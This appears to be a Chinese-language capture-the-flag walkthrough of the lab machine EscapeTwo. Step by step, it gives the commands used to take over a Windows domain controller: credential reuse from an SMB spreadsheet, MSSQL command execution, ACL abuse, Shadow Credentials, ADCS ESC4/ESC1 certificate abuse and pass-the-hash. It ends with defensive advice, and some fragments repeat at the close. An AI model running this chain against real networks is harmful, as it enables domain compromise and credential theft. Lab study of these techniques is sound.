Windows渗透实战之EscapeTwo教学文档<\/h1>

1. 初始信息与目标<\/h2>
目标机器<\/strong>: DC01.sequel.htb (10.10.11.51)
初始凭据<\/strong>: rose \/ KxEPkKe6R8su<\/p>

2. 信息收集阶段<\/h2>
2.1 端口扫描<\/h3>
使用nmap进行TCP端口扫描：<\/p>
sudo nmap -sT --min-rate 10000<\/span> -p- 10.10.11.51 -oA nmapscan\/ports <\/span><\/span><\/code><\/pre>开放端口<\/strong>:<\/p> 53\/tcp - domain (DNS) 88\/tcp - kerberos-sec (Kerberos认证) 135\/tcp - msrpc (Microsoft RPC) 139\/tcp - netbios-ssn (NetBIOS会话服务) 389\/tcp - ldap (Active Directory LDAP) 445\/tcp - microsoft-ds (SMB文件共享) 464\/tcp - kpasswd5 (Kerberos密码修改) 593\/tcp - http-rpc-epmap (RPC over HTTP) 636\/tcp - ldapssl (安全LDAP) 1433\/tcp - ms-sql-s (Microsoft SQL Server) 3268\/tcp - globalcatLDAP (全局目录LDAP) 3269\/tcp - globalcatLDAPssl (安全全局目录LDAP) 5985\/tcp - wsman (Windows远程管理) 9389\/tcp - adws (Active Directory Web服务) 47001\/tcp - winrm (Windows远程管理) 49664-49808\/tcp - 动态随机端口 <\/code><\/pre> 2.2 UDP扫描<\/h3> nmap -sU --top-ports 20<\/span> 10.10.11.51 <\/span><\/span><\/code><\/pre>重要UDP端口<\/strong>:<\/p> 53\/udp - domain (DNS) 88\/udp - kerberos-sec (Kerberos认证) 389\/udp - ldap (Active Directory LDAP) <\/code><\/pre> 2.3 详细服务扫描<\/h3> nmap -sTVC -O -p$ports 10.10.11.51 <\/span><\/span><\/code><\/pre>关键发现<\/strong>:<\/p> 域名为sequel.htb<\/li> 主机名为DC01.sequel.htb<\/li> 运行Microsoft SQL Server 2019 (15.00.2000.00; RTM)<\/li> Windows版本: 10.0.17763<\/li> <\/ul> 3. 初始渗透<\/h2> 3.1 SMB服务利用<\/h3> 使用初始凭据访问SMB共享:<\/p> smbclient -L \/\/10.10.11.51 -U rose%KxEPkKe6R8su <\/span><\/span><\/code><\/pre>发现共享文件夹<\/strong>:<\/p> Accounting Department<\/li> <\/ul> 访问共享并下载文件:<\/p> smbclient \/\/10.10.11.51\/"Accounting Department"<\/span> -U rose%KxEPkKe6R8su <\/span><\/span>get accounts.xlsx <\/span><\/span><\/code><\/pre>accounts.xlsx内容<\/strong>:<\/p> 用户名密码 sa MSSQLP@ssw0rd! sql_svc SQLP@ssw0rd! ryan WqSZAF6CysDQbGb3 <\/code><\/pre> 3.2 MSSQL服务利用<\/h3> 尝试使用sa凭据:<\/p> netexec mssql sequel.htb -u 'sa'<\/span> -p 'MSSQLP@ssw0rd!'<\/span> --local-auth <\/span><\/span><\/code><\/pre>执行命令获取shell:<\/p> netexec mssql sequel.htb -u 'sa'<\/span> -p 'MSSQLP@ssw0rd!'<\/span> --local-auth -x 'powershell -e ...'<\/span> <\/span><\/span><\/code><\/pre>发现<\/strong>:<\/p> 获得sql_svc的shell<\/li> 在C:\SQL2019\ExpressAdv_ENU\目录下发现sql-Configuration.INI<\/li> 找到密码: WqSZAF6CysDQbGb3<\/li> <\/ul> 4. 横向移动<\/h2> 4.1 使用ryan凭据<\/h3> 使用evil-winrm连接:<\/p> evil-winrm -i 10.10.11.51 -u ryan -p WqSZAF6CysDQbGb3 <\/span><\/span><\/code><\/pre>4.2 BloodHound枚举<\/h3> 发现ryan对ca_svc用户有WriteOwner权限<\/p> 利用步骤<\/strong>:<\/p> 将ryan设置为ca_svc的owner:<\/p> Set-DomainObjectOwner -Identity ca_svc -OwnerIdentity ryan <\/span><\/span><\/code><\/pre><\/li> 修改ACL:<\/p> Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights All <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.3 获取Shadow Credentials<\/h3> 参考: https:\/\/exploit-notes.hdks.org\/exploit\/windows\/active-directory\/shadow-credentials\/<\/p> # 使用Whisker添加Shadow Credentials<\/span> <\/span><\/span>Whisker.exe add \/target:<\/span>ca_svc \/domain:<\/span>sequel.htb \/dc:<\/span>DC01.sequel.htb \/path:<\/span>C:\path\to\cert.pfx \/password:<\/span>password <\/span><\/span> <\/span><\/span># 使用Rubeus请求TGT<\/span> <\/span><\/span>Rubeus.exe asktgt \/user:<\/span>ca_svc \/certificate:<\/span>C:\path\to\cert.pfx \/password:<\/span>password \/ptt <\/span><\/span><\/code><\/pre>5. ADCS证书服务攻击<\/h2> 5.1 枚举ADCS<\/h3> 使用certipy-ad枚举:<\/p> certipy-ad find -u ca_svc@sequel.htb -p 'password'<\/span> -dc-ip 10.10.11.51 <\/span><\/span><\/code><\/pre>5.2 ESC4攻击<\/h3> 发现模板存在访问控制漏洞，可被利用进行ESC1攻击<\/p> 利用步骤<\/strong>:<\/p> 修改模板使其易受ESC1攻击<\/p> <\/li> 请求证书:<\/p> certipy-ad req -u ca_svc@sequel.htb -p 'password'<\/span> -target DC01.sequel.htb -ca 'sequel-DC01-CA'<\/span> -template 'VulnerableTemplate'<\/span> -upn 'administrator@sequel.htb'<\/span> <\/span><\/span><\/code><\/pre><\/li> 获取管理员哈希:<\/p> certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.51 <\/span><\/span><\/code><\/pre><\/li> <\/ol> 6. 权限提升与最终访问<\/h2> 使用获取的管理员凭据通过evil-winrm连接:<\/p> evil-winrm -i 10.10.11.51 -u administrator -H 'administrator_ntlm_hash'<\/span> <\/span><\/span><\/code><\/pre>7. 关键知识点总结<\/h2> 端口与服务识别<\/strong>:<\/p> 识别标准域控制器服务(53,88,389,445等)<\/li> 注意SQL Server(1433)和WinRM(5985,47001)端口<\/li> <\/ul> <\/li> 初始访问<\/strong>:<\/p> SMB共享中常存储敏感文件(如accounts.xlsx)<\/li> 密码重用是常见问题<\/li> <\/ul> <\/li> 横向移动技术<\/strong>:<\/p> BloodHound用于识别特权关系<\/li> WriteOwner权限可被提升为完全控制<\/li> Shadow Credentials技术绕过密码认证<\/li> <\/ul> <\/li> ADCS攻击<\/strong>:<\/p> ESC1和ESC4是常见的证书服务漏洞<\/li> certipy-ad是强大的ADCS攻击工具<\/li> <\/ul> <\/li> 最终提权<\/strong>:<\/p> 通过证书服务获取域管理员权限<\/li> 使用哈希传递进行最终认证<\/li> <\/ul> <\/li> <\/ol> 8. 防御建议<\/h2> 限制SMB共享的访问权限<\/li> 实施严格的密码策略，避免密码重用<\/li> 定期审计Active Directory权限<\/li> 监控证书模板的修改<\/li> 限制特权账户的证书注册权限<\/li> 启用LSA保护防止凭据盗窃<\/li> <\/ol>

Windows渗透实战之EscapeTwo教学文档<\/h1>

1. 初始信息与目标<\/h2> 目标机器<\/strong>: DC01.sequel.htb (10.10.11.51) 初始凭据<\/strong>: rose \/ KxEPkKe6R8su<\/p>

3. 初始渗透<\/h2>

4. 横向移动<\/h2>

5. ADCS证书服务攻击<\/h2>

8. 防御建议<\/h2> 限制SMB共享的访问权限<\/li> 实施严格的密码策略，避免密码重用<\/li> 定期审计Active Directory权限<\/li> 监控证书模板的修改<\/li> 限制特权账户的证书注册权限<\/li> 启用LSA保护防止凭据盗窃<\/li> <\/ol>

1. 初始信息与目标<\/h2>
目标机器<\/strong>: DC01.sequel.htb (10.10.11.51)
初始凭据<\/strong>: rose \/ KxEPkKe6R8su<\/p>

8. 防御建议<\/h2>

限制SMB共享的访问权限<\/li>
实施严格的密码策略，避免密码重用<\/li>
定期审计Active Directory权限<\/li>
监控证书模板的修改<\/li>
限制特权账户的证书注册权限<\/li>
启用LSA保护防止凭据盗窃<\/li> <\/ol>